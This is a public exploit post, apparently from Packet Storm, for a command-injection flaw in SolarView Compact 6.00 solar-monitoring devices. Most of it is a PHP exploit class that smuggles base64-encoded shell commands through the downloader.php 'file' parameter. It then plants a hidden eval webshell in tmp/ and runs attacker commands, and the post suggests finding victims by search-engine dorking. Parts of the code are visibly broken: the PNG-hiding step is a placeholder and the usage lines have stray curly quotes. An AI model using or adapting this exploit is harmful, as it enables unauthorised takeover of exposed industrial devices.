Headline

SolarView Compact 6.00 Code Injection

SolarView Compact version 6.00 suffers from a PHP code injection vulnerability.

25 days ago

#vulnerability #web #windows #google #php #auth #firefox

=============================================================================================================================================
| # Title : SolarView Compact 6.00 Code Injection Vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.2 (64 bits) |
| # Vendor : https://www.contec.com/ |
=============================================================================================================================================

POC :

[+] Dorking İn Google Or Other Search Enggine.

[+] uses the CURL to Allow remote command .

[+] Line 112 set your target .

[+] save code as poc.php .

[+] USage : cmd => c:\www\test\php poc.php

[+] PayLoad :

<?php

class SolarViewExploit {
private $targetUri;
private $webshellName;
private $postParam;
private $timeout;

public function __construct($targetUri, $timeout = 40) {  
    $this->targetUri = rtrim($targetUri, '/');  
    $this->timeout = $timeout;  
}

public function uploadWebshell($webshell = null) {  
    // Randomize file name if option WEBSHELL is not set  
    $this->webshellName = $webshell ?? $this->generateRandomFileName();

    $this->postParam = $this->generateRandomString(8);

            // Inject PHP payload into the PLTE chunk of a PNG image to hide the payload  
    $phpPayload = "<?php @eval(base64_decode(\$_POST['{$this->postParam}']));?>";  
    $pngWebshell = $this->injectPhpPayloadPng($phpPayload);

    if ($pngWebshell === null) {  
        return null;  
    }

    // Encode webshell data and write to file on the target at the tmp directory for execution  
    $payload = base64_encode($pngWebshell);  
    $cmd = "echo {$payload}|base64 -d >tmp/{$this->webshellName}";  
    return $this->executeCommand($cmd);  
}

public function executePhp($cmd) {  
    $payload = base64_encode($cmd);  
    return $this->sendRequest('POST', "/tmp/{$this->webshellName}", [  
        $this->postParam => $payload  
    ]);  
}

public function executeCommand($cmd) {  
    // Encode payload with base64 to ensure proper execution  
    $payload = base64_encode($cmd);  
    $cmd = "echo {$payload}|base64 -d|bash";  
    return $this->sendRequest('GET', '/downloader.php', [  
        'file' => ";{$cmd};.zip"  
    ]);  
}

public function check() {  
    // Checking if the target is vulnerable by echoing a randomised marker  
    echo "Checking if {$this->targetUri} can be exploited.\n";  
    $marker = $this->generateRandomString(16);  
    $res = $this->executeCommand("echo {$marker};cat /opt/svc/version");

    if ($res && $res['code'] == 200 && strpos($res['body'], $marker) !== false) {  
        if (preg_match('/SolarView Compact ver\.\d\.\d\d/', $res['body'], $matches)) {  
            return "Vulnerable: " . $matches[0];  
        }  
    }  
    return 'Safe: No valid response received from the target.';  
}

public function exploit($payload) {  
    echo "Executing payload on {$this->targetUri}.\n";  
    $res = $this->uploadWebshell();

    if (!$res || $res['code'] !== 200) {  
        throw new Exception('Web shell upload error.');  
    }

    $this->executePhp($payload);  
}

private function sendRequest($method, $uri, $params) {  
    $url = $this->targetUri . $uri;  
    $options = [  
        'http' => [  
            'method' => $method,  
            'header' => 'Content-Type: application/x-www-form-urlencoded',  
            'timeout' => $this->timeout,  
            'content' => http_build_query($params)  
        ]  
    ];

    $context = stream_context_create($options);  
    $response = @file_get_contents($url, false, $context);  
    $code = isset($http_response_header[0]) ? intval(substr($http_response_header[0], 9, 3)) : 0;

    return [  
        'code' => $code,  
        'body' => $response  
    ];  
}

private function injectPhpPayloadPng($phpPayload) {  
    // Here you would implement the logic to inject the PHP payload into a PNG file.  
    // This is a placeholder implementation.  
    return $phpPayload; // Modify this to return the actual PNG with embedded PHP payload.  
}

private function generateRandomFileName($length = 16) {  
    return bin2hex(random_bytes($length / 2)) . '.php';  
}

private function generateRandomString($length) {  
    return bin2hex(random_bytes($length / 2));  
}

}

// Example of usage
$targetUri = 'http://target-ip’; // Replace with the actual target URL
$exploit = new SolarViewExploit($targetUri);
echo $exploit->check();
$exploit->exploit(‘whoami’); // Replace with your payload

Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================

Packet Storm: Latest News

TOR Virtual Network Tunneling Tool 0.4.8.13

1 day ago

Packet Storm

Debian Security Advisory 5802-1

1 day ago

Packet Storm

Sysax Multi Server 6.99 SSH Denial Of Service

1 day ago

Packet Storm

Sysax Multi Server 6.99 Cross Site Scripting

1 day ago

Packet Storm

IBM Security Verify Access 32 Vulnerabilities

1 day ago

Packet Storm